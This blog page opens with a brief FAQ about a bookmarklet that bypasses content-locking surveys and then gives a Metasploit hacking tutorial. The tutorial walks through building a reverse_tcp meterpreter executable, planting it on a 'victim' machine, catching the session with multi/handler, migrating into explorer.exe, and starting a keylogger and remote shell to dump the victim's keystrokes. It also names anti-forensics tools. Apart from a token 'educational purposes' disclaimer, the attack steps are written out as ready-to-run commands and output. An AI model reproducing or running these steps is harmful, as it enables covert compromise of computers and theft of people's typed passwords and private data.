A. The Survey Remover bookmarklet is completely free to use. It always has been and it always will be. The bookmarklet is able to remove exactly the same surveys as the addon (just with less features and a small advert after using it), allowing you to browse the internet and not have to complete surveys, which waste your time, money and threaten your privacy. The bookmarklet can be found on this page.

Q. Is this legal?

A. The remover does not do anything adverse to any servers: it merely changes the way you see pages so that you don't have to fill in surveys. However, you should read the Terms and Conditions of this site before using the remover and that of the site you are using the remover on to ensure that you are not breaking any rules. (This site takes no responsibility for the use of the remover.)

Q. Who runs this project?

A. Despite what many people think, this project is not run by a team of developers; it has instead been created and is kept alive by one dedicated individual, who believes that content blocking surveys are detrimental to the internet and bad for any individual's privacy (and often finances too).

However, there are many people who are also vital to keeping this project alive. Notable figures include Norman who has helped greatly in the development and maintenance of the site and remover. Another special thanks goes out to anyone who has donated to the project: without them, the Survey Remover would have never reached this stage, and it certainly wouldn't be able to keep running.

If you liked this post, Then +1 it on google+ and like our facebook fan page for latest updates
Read More

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---


Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.
Read More

© Copacopi, AllRightsReserved.